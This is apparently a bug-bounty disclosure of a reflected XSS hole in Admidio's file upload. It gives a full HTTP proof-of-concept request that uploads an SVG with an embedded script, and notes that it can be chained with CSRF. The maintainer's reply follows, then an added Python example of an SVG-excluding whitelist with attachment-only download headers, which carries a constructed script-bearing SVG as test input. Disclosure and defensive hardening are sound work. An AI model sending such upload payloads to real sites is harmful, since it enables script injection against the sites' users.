Cross-site Scripting (XSS) - Reflected in admidio/admidio
Reported on
Oct 17th 2021
Description
I am still able to reproduce the SVG-XSS vulnerability here https://huntr.dev/bounties/96221dff-0d40-4326-9a9e-f66608307980/ on my local system (I just downloaded the latest release from the website). I think you may have accidentally included SVG files in the whitelist.
Proof of Concept
POST /admidio/adm_program/system/file_upload.php?module=documents_files&mode=upload_files&id=6 HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------105596666835784551932184244642
Content-Length: 571
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/admidio/adm_program/system/file_upload.php?module=documents_files&id=6
Cookie: ADMIDIO_INSTALLATION_SESSION_ID=ajhu2uaaoaha7fk8vpdv165kao; ADMIDIO_abc_db_adm_SESSION_ID=r1pltsf7bp9fodrffonheefdnd; 'ADMIDIO_abc_db_adm_cookieconsent_status=dismiss; OJSSID=4bbfi99a73d9r0f5jm94irg6ls; PHPSESSID=3l4k4gsg30qn5ed2al4un9l5j7

-----------------------------105596666835784551932184244642
Content-Disposition: form-data; name="files[]"; filename="payload.svg"
Content-Type: image/svg+xml

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.location);
</script>
</svg>
-----------------------------105596666835784551932184244642--
Impact
This vulnerability is capable of reflected XSS via upload of malicious SVG files.
Note: Can be chained with CSRF to perform XSS without the need of upload privileges.
Patch fix here: https://github.com/Admidio/admidio/commit/b8fa68c830cc1c347f8b5d19cbd33c79ea747ddc
Fix should treat SVG as attachments instead of inline files, preventing XSS issue...
My apologies, please ignore the patch fix as I don't think it's complete.
I added the whitelist after I fixed the original post from you and then didn't check the whitelist against SVG :-( Now I removed SVG from the whitelist.
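The two mitigations discussed in this thread (an extension whitelist that does not contain SVG, and serving stored uploads as attachments rather than inline) are shown below as an added example in Python. This is not Admidio's code and it does not reproduce the project's upload handler; the whitelist, the magic-byte table, the SVG sniffing rules and the header set are this example's own assumptions. The sample SVG in the usage block is constructed, not the report's payload.

```python
"""Upload validation and download headers for a document store.

Added example, not Admidio's code. The whitelist, the sniffing rules and
the header set are assumptions made for illustration.
"""
import re

# Extension whitelist (constructed). "svg" is deliberately absent: the
# report above is about SVG slipping into exactly such a list.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt", "docx"}

# Leading magic bytes for the binary types we accept (constructed subset);
# an extension we accept but whose content does not start with these is rejected.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

# Markers that identify SVG content regardless of the file name (assumption).
_SVG_MARKERS = (b"<svg", b"<!doctype svg", b'xmlns="http://www.w3.org/2000/svg"')


def extension_of(filename: str) -> str:
    """Return the lower-cased final extension of a file name, or '' if none."""
    name = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    if "." not in name:
        return ""
    return name.rsplit(".", 1)[1].lower()


def looks_like_svg(data: bytes) -> bool:
    """Content-based check: an SVG renamed to .png is still parsed as SVG if a
    browser ever sniffs it, so the first KiB is inspected whatever the name says."""
    head = data[:1024].lower()
    return any(marker in head for marker in _SVG_MARKERS)


def validate_upload(filename: str, data: bytes, declared_type: str):
    """Return (accepted, reason). Rejects on extension, declared MIME type, or content."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext or '<none>'}' not in whitelist"
    if declared_type.split(";", 1)[0].strip().lower() == "image/svg+xml":
        return False, "declared type image/svg+xml is not accepted"
    if looks_like_svg(data):
        return False, "content looks like SVG despite extension"
    magic = IMAGE_MAGIC.get(ext)
    if magic is not None and not data.startswith(magic):
        return False, f"content does not match magic bytes for .{ext}"
    return True, "ok"


_UNSAFE = re.compile(r"[^A-Za-z0-9._-]")


def download_headers(filename: str, stored_type: str) -> dict:
    """Headers for serving a stored upload back: always an attachment, never inline.

    Even if an SVG reached the store, 'attachment' plus 'nosniff' keeps the browser
    from rendering it in the application's origin, and the CSP 'sandbox' directive
    isolates it if a client renders the response anyway.
    """
    safe_name = _UNSAFE.sub("_", filename.rsplit("/", 1)[-1]) or "download"
    content_type = stored_type or "application/octet-stream"
    if content_type.lower().startswith("image/svg"):
        content_type = "application/octet-stream"
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    # Constructed sample: an SVG carrying a script element, once under its own
    # name and once renamed to .png to show that the content check still fires.
    sample_svg = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
                  b"<script>alert(1)</script></svg>")
    print(validate_upload("payload.svg", sample_svg, "image/svg+xml"))
    print(validate_upload("payload.png", sample_svg, "image/png"))
    print(validate_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16, "image/png"))
    print(download_headers("payload.svg", "image/svg+xml"))
```

The extension whitelist alone is the fix the maintainer applied; the content sniff and the attachment headers are defence in depth, so that a type that is later added to the list by mistake, or an SVG smuggled under another extension, does not execute in the application's origin.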